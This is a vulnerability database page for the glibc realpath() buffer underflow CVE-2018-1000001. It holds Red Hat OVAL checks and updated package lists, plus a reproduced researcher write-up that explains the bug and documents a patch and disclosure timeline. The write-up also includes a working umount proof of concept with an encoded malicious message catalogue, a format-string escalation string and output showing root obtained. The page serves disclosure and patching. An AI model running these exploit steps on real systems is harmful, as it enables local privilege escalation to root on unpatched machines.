source	https://packetstormsecurity.com/files/145970/glibc-getcwd-Local-Privilege-Escalation.html
title	glibc getcwd() Local Privilege Escalation

Redhat

advisories

bugzilla

id	1533836
title	CVE-2018-1000001 glibc: realpath() buffer underflow when getcwd() returns relative path allows privilege escalation

oval

comment Red Hat Enterprise Linux must be installed
oval oval:com.redhat.rhba:tst:20070304026

AND

comment Red Hat Enterprise Linux 7 is installed
oval oval:com.redhat.rhba:tst:20150364027

AND
comment glibc-utils is earlier than 0:2.17-222.el7
oval oval:com.redhat.rhsa:tst:20180805001
comment glibc-utils is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20120763012
AND
comment glibc-headers is earlier than 0:2.17-222.el7
oval oval:com.redhat.rhsa:tst:20180805003
comment glibc-headers is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20120763010
AND
comment glibc-devel is earlier than 0:2.17-222.el7
oval oval:com.redhat.rhsa:tst:20180805005
comment glibc-devel is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20120763006
AND
comment nscd is earlier than 0:2.17-222.el7
oval oval:com.redhat.rhsa:tst:20180805007
comment nscd is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20120763014
AND
comment glibc is earlier than 0:2.17-222.el7
oval oval:com.redhat.rhsa:tst:20180805009
comment glibc is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20120763004
AND
comment glibc-common is earlier than 0:2.17-222.el7
oval oval:com.redhat.rhsa:tst:20180805011
comment glibc-common is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20120763008
AND
comment glibc-static is earlier than 0:2.17-222.el7
oval oval:com.redhat.rhsa:tst:20180805013
comment glibc-static is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20120763002

rhsa

id	RHSA-2018:0805
released	2018-04-10
severity	Moderate
title	RHSA-2018:0805: glibc security, bug fix, and enhancement update (Moderate)

rpms

glibc-0:2.17-222.el7
glibc-common-0:2.17-222.el7
glibc-debuginfo-0:2.17-222.el7
glibc-debuginfo-common-0:2.17-222.el7
glibc-devel-0:2.17-222.el7
glibc-headers-0:2.17-222.el7
glibc-static-0:2.17-222.el7
glibc-utils-0:2.17-222.el7
nscd-0:2.17-222.el7

Seebug

bulletinFamily	exploit
description	### Introduction The vulnerability described here is caused by Linux kernel behaviour change in the syscall API (returning relative pathnames in getcwd()) and non-defensive function implementation in libc (failing to process that pathname correctly). Other libraries are very likely to be affected as well. On affected systems this vulnerability can be used to gain root privileges via SUID binaries. The return value specification change in getcwd() was introduced in Linux kernel Linux 2.6.36. It has already caused troubles, even in realpath(), but at different location (see bug report) and was not identified as security issue. Linux kernel side: One of the weaknesses of Linux kernel is, that it is not fully POSIX compliant (see Wikipedia POSIX). To allow programmers to produce clean and secure code, meticulous documentation would be needed, especially to write cross-platform software. Changes in specification and documentation after software was already written always pose an extra risk. This is also true for commit vfs: show unreachable paths in getcwd and proc changing the behaviour of getcwd(). The new specification made it finally to the manpages (see getcwd(2)), but at that time glibc was already written. From the somehow contradictory man page: These functions return a null-terminated string containing an _absolute_ pathname that is the current working directory of the calling process. The pathname is returned as the function result and via the argument buf, if present. If the current directory is not below the root directory of the current process (e.g., because the process set a new filesystem root using chroot(2) without changing its current directory into the new root), then, since Linux 2.6.36, the returned path will be prefixed with the string "(unreachable)". Such behavior can also be caused by an unprivileged user by changing the current directory into another mount namespace. When dealing with paths from untrusted sources, callers of these functions should consider checking whether the returned path starts with '/' or '(' to avoid misinterpreting an unreachable path as a relative path.... ...getcwd() conforms to POSIX.1-2001. Note however that POSIX.1-2001 leaves the behavior of getcwd() unspecified if buf is NULL. The documentation is accurate regarding use of (unreachable) but most likely not according POSIX compliance. At least POSIX 2004 and 2008 are violated, 2001 version of standard seems not available for free. According to IEEE Std 1003.1-2008 specification of getcwd(): The getcwd() function shall place an absolute pathname of the current working directory in the array pointed to by buf, and return buf. The pathname shall contain no components that are dot or dot-dot, or are symbolic links. As it seems, that consequences from the change of interface specification on Linux kernel side only were not recognized by all affected parties. The realpath() function, which relies on using getcwd() to resolve relative path names still required the old behaviour. Also the manpage does not reflect the changes in underlying getcwd() call, see realpath(3). Libc side: glibc still assumes that kernel getcwd() would return absolute pathnames and relies on that behaviour when realpath() attempts to create a canonicalized absolute pathname: realpath() expands all symbolic links and resolves references to /./, /../ and extra '/' characters in the null-terminated string named by path to produce a canonicalized absolute pathname... When resolving a relative symbolic link, e.g. ../../x, realpath() will use the current working directory, assuming it will start with a /. The function starts at the end of the getcwd pathname to jump forward from slash to slash for each ../ found in the symbolic link to resolve. It does not check the boundaries of the buffer, thus may end up at a slash before the string buffer used to create the canonicalized absolute pathname. So resolving the link named above with getcwd() returning (unreachable)/, the second ../ will have moved the pointer before the buffer, the next part x is then copied to this memory location. As realpath usually operates on heap buffers. ### Methods This section describes how to improve a simple demonstrator to a complex, ASLR-aware high-reliable exploit. The steps used might not be the most elegant way to do so. Any hints for improvement are appreciated. To exploit the underflow for privilege escalation, the mount, unmount SUID binaries are most suitable targets: they process pathes using realpath(), do not drop privileges and can be invoked by any user. umount was selected as candidate as it allows to process more than one mountpoint per run, thus traversing the problematic code more than once. This seemed to be the best way to allow user controlled gradual memory editing, defeat of ASLR measures and finally quite reliable code execution. As umount realpath() operates on heap, the first step was to create a reproducible heap layout. This was done be removing all interfering environment variables and just working with those related to locale support. As locales are initialized before umount option parsing, this editing affectes the heap structure and content lower addresses than the buffer used in the fatal realpath() call. Therefore the current exploit relies on the availability of a single locale, but libc-bin on standard systems provides one: /usr/lib/locale/C.UTF-8. It is loaded by using the environment variable LC_ALL=C.UTF-8. After locale setup, the realpath buffer underflow will overwrite a slash in a locale string, used for loading of national language support (NLS) files, thus changing it to a relative pathname. Thus user controlled translations of umount error messages are loaded, giving write access to some memory adresses using the %n format feature of fprintf to modify memory. As the stack layout used by fprintf is fixed, any address references will work without considering ASLR. Luckily, one of those references points to the struct libmnt_context defined in libmount/src/mountP.h from util-linux: ``` struct libmnt_context { int action; /* MNT_ACT_{MOUNT,UMOUNT} / int restricted; / root or not? / char fstype_pattern; /* for mnt_match_fstype() / char optstr_pattern; /* for mnt_match_options() / ... ``` As the restricted field is within reach, overwriting it will make umount believe, that it was started by root, even when it was not. This can be used for a quite simple DoS by unmounting the root filesystem, which will cause very funny side effects on running programs, e.g. aborts, SEGV, .... Follwing commands demonstrate the behaviour on fully patched Debian Stretch amd64 with libc6 2.24-11+deb9u1 and umount from package mount 2.29.2-1. Keep in mind, that this simplified POC operates on the umount process memory, thus will need adoption to other software versions: ``` # Enable USERNS clone as root for demonstration: root$ echo 1 > /proc/sys/kernel/unprivileged_userns_clone # As normal user create a new namespace: test$ /usr/bin/unshare -m -U --map-root-user /bin/sh # Caveat: following steps are performed as USERNS-root, not real # root user. root$ mount -t tmpfs tmpfs /tmp root$ cd /tmp root$ chmod 00755 . root$ mkdir -p -- "(unreachable)/tmp" "(unreachable)/tmp/from_archive/C/LC_MESSAGES" "(unreachable)/x" root$ ln -s ../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A "(unreachable)/tmp/down" # Make mount unrestricted by overwriting struct libmnt_context, thus # affecting mnt_context_is_restricted in "libmount/src/context.c". root$ base64 -d <<B64-EOF \| bzip2 -cd > "(unreachable)/tmp/from_archive/C/LC_MESSAGES/util-linux.mo" QlpoOTFBWSZTWTOfm9IAAGX/pn6UlARGB+FeKyZnAD/n3mACAAAgAAEgAJSIqfkpspk0eUGJ6gAG mQeoaD1PJAamlPJGCNMTIaNGmnqMQ0AAzSwpEWpQICVUw+490ohZBgZ+s4EBAZCn/TavSQshtCiv iG6HOehyAp4FPt3zkpdTxNchTYITLBkXUjsgpN2QDBNX8qmbpkVgfLXKcQc1ZhVF0FxUQOtnbGlL 5NhRmORwmQF1Dw3Yu1mds6tGAmnLwWwc2KRKGl5hcLuSKcKEgZz83pA= B64-EOF root$ echo "$$" 2299 # Now continue in another shell using the USERNS pid from before: test$ cd /proc/2299/cwd test$ LC_ALL=C.UTF-8 /bin/umount --lazy down / umount: AAlnAAAAAAAAAAA ``` The simplified single-stage POC from above has multiple drawbacks: it can only reliable toggle the permissions bit, thus allowing unmounting / causing DoS, but not arbitrary code execution. For that, ASLR has to be defeated first. This can be done by following sequence of events: Start umount with large number of environment variables that containing "AANGUAGE=X.X", that are just one letter off from correct language settings. The large number of environment variables "sprays" the upper stack area with a long list of valid pointers. * Let umount call realpath() and underflow. When the error message is printed, a first-stage message catalogue file is loaded and the format string dumps the whole stack to stderr, remove the "restricted" bit similar to simplified POC and write a 'L' to the sprayed stack, modifying one entry to "LANGUAGE=X.X". * Due to change of language, umount will attemt to load another language catalogue. As the exploit prepared a pipe with that name, umount will block here giving the exploit the chance to synchronize, create an updated message catalogue and let umount continue. * The updated format strings now contain all offsets for the currently running binary. But the stack does not contain suitable pointers for writing and fprintf ignores changes of argument pointers while running because secure printf copies the values down the stack, where we cannot use them directly. Hence fprintf must be invoked more than once with the same (unmodified) format string, but still has to behave different on each invocation to overwrite different memory locations. This is done using the format string itself for arithmetics, each fprintf invocation as clock and the length of path-name input as instruction pointer, thus creating a simplified virtual machine. * The repeated format string processing changes the return pointer from main function to two other functions: getdate() and execl(). Those functions were choosen for ROP because a single call to system() would not work on Ubuntu. This is due to /bin/sh having a patch missing in Debian, that will reset the effective UID when not matching the the current UID. But as exec calls require a more complex stack/register configuration, let getdate() do the work for us. For escalation using umount, calling execve in the end should work also on SELinux/AppArmor hardened systems. Umount needs to call file system helpers during normal operation also. On other systems, execl() could be replaced by dlopen(), to inject code into running process. * The invoked program file contains a shebang to make the operating system invoke the exploit program as interpreter. The exploit then changes his own file ownership and mode to become a root SUID binary and terminates. Starting the shell here immediately would be possible, but the mount process has a strange set of environment variables, which is not so convenient for further shell use. Apart from that, by terminating the caller can detect successful escalation, perform all cleanup. * When the initial caller of mount notices the mode change of the file, it performs the cleanup and invokes the SUID binary to use its secondary function - a SUID shell, thus completing the escalation. All those steps are currently implemented in RationalLove.c apart for the code to create the namespace. Therefore the pid of a suitable namespace process has to be hardcoded before compiling. Here is the output of exploit invocation: ``` test@test$ ./RationalLove ./RationalLove: setting up environment ... ./RationalLove: using umount at "/bin/umount". Attempting to gain root, try 1 of 10 ... Starting subprocess Stack content received, calculating next phase Found source address location 0x7fffb6505d18 pointing to target address 0x7fffb6505de8 with value 0x7fffb650723f, libc offset is 0x7fffb6505d08 Changing return address from 0x7f9617db62b1 to 0x7f9617e41c30, 0x7f9617e4e900 Using escalation string %67$hn%71$hn%1$6116.6116s%65$hn%69$hn%1$1100.1100s%64$hn%1$25446.25446s%66$hn%70$hn%1$26986.26986s%68$hn%1$5888.5888s%1$23798.23798s%1$s%1$s%63$hn%1$s%1$s%1$s%1$s%1$s%1$s%1$186.186s%37$hn-%35$lx-%37$lx-%62$lx-%63$lx-%64$lx-%65$lx-%66$lx-%67$lx-%68$lx-%69$lx-%78$s Executable now root-owned Cleanup completed, re-invoking binary /proc/self/exe: invoked as SUID, invoking shell ... root@test# id uid=0(root) gid=0(root) groups=0(root),100(users) ``` ASLR could also be circumvented using a but in mount environment variable handling, see util-linux mount/unmount ASLR bypass via environment variable. ### Results, Discussion As for example, misbehaviour can be triggered when performing a getcwd call in a directory not visible in the current mount namespace of the process. See mount_namespaces man page for more information. Therefore a process has to reach such a directory within another namespace. There should be various ways to do that, e.g. using the proc filesystem to enter the working directory of another process (method used in exploit), by passing file descriptors via SCM_RIGHTS between cooperating processes in different namespaces. Therefore this vulnerability shows again the importance of system hardening by disabling USERNS when not needed. On a system with unprivileged USERNS enabled, an attacker can create all required namespaces. On other systems, it might be possible to use namespaces created by other processes using the proc access approach. These can be discovered using readlink /proc//ns/mnt \| sort -u. While systemd-udevd just uses a namespace in a way required for exploitation, the /proc/[pid]/cwd link cannot accessed by unprivileged users. Still systemd-udevd is a good example, how hardening of a single application by namespaces might also create additional attack surface, not only in the application itself. Hence the attack method described here may also be appropriate to attack other applications using the same hardening measures, e.g. lxc or docker. Affected systems: Systems with Linux Kernel prepending getcwd() path with non-path components, e.g. to indicate unreachable pathes. Such code can be found in fs/dcache.c: ``` static int prepend_unreachable(char buffer, int buflen) { return prepend(buffer, buflen, "(unreachable)", 13); } ``` Most likely this code was created in analogy to the (deleted) suffix to indicate file handles to deleted files, e.g.: ``` test$ touch /tmp/x test$ exec 3</tmp/x test$ rm /tmp/x test$ readlink /proc/self/fd/3 /tmp/x (deleted) ``` Userspace: Currently only libc is proven to misbehave when Linux getcwd() returns a relative path. But other libraries or tools might also fail in unexpected ways due to that bug. ``` glibc: Here the underflow occurs in __realpath from stdlib/canonicalize.c: 42 char * 43 __realpath (const char name, char resolved) 44 { ... # When resolving a relative pathname, getcwd() is called: 86 if (name[0] != '/') 87 { 88 if (!__getcwd (rpath, path_max)) 89 { 90 rpath[0] = '\0'; 91 goto error; 92 } 93 dest = __rawmemchr (rpath, '\0'); 94 } 95 else ... # Loop over all name components: 101 for (start = end = name; start; start = end) 102 { ... # If the name component is "..", remove it. This underflows the # buffer if rpath does not contain a starting slash. 118 else if (end - start == 2 && start[0] == '.' && start[1] == '.') 119 { 120 / Back up to previous component, ignore if at root already. / 121 if (dest > rpath + 1) 122 while ((--dest)[-1] != '/'); 123 } 124 else # The name component is not ".", "..", so copy the name to dest. 125 { 126 size_t new_size; 127 128 if (dest[-1] != '/') 129 dest++ = '/'; ... Therefore a simple patch could be glibc-fail-on-unreachable-v1.patch (nearly UNTESTED, older version v0): --- stdlib/canonicalize.c 2018-01-05 07:28:38.000000000 +0000 +++ stdlib/canonicalize.c 2018-01-05 14:06:22.000000000 +0000 @@ -91,6 +91,11 @@ goto error; } dest = __rawmemchr (rpath, '\0'); +/* If path is empty, kernel failed in some ugly way. Realpath +has no error code for that, so die here. Otherwise search later +on would cause an underrun when getcwd() returns an empty string. +Thanks Willy Tarreau for pointing that out. / + assert (dest != rpath); } else { @@ -118,8 +123,17 @@ else if (end - start == 2 && start[0] == '.' && start[1] == '.') { / Back up to previous component, ignore if at root already. / - if (dest > rpath + 1) - while ((--dest)[-1] != '/'); + dest--; + while ((dest != rpath) && (--dest != '/')); + if ((dest == rpath) && (dest != '/') { + / Return EACCES to stay compliant to current documentation: + "Read or search permission was denied for a component of the + path prefix." Unreachable root directories should not be + accessed, see https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/ / + __set_errno (EACCES); + goto error; + } + dest++; } else { ``` Outlook: It might be worth analyzing how ftp server implementation, webservers will react in such context. In some cases, this may require combination with application specific bugs or unexpected behaviour, e.g. ApacheNoFollowSymlinkTimerace. ### Timeline 20171231: Reported to distros list as glibc errors should be reported to distros first. * 20180101: Info distros: kernel issue should be handled first. Reported to kernel security. * 20180102: Kernel security reply: getcwd() behaviour documented in "getcwd() 3" man pages, not an issue. Only libraries need fixing. * 20180107: Final high-reliability anti-ASLR exploit for Stretch/Xenial using getdate/execl * 20180110: CVE CVE-2018-1000001 assigned. * 20180111: Publication without exploit code. * 20180112: SUSE distributes fixes: SUSE-SU-2018:0071-1 * 20180116: Release of demonstrator code
id	SSV:97106
last seen	2018-01-26
modified	2018-01-26
published	2018-01-26
reporter	Root
title	Libc Realpath缓冲区下溢漏洞(CVE-2018-1000001)

Summary

Vulnerable Configurations

Common Weakness Enumeration (CWE)

Exploit-Db

Metasploit

Nessus

Packetstorm

Redhat

Seebug

References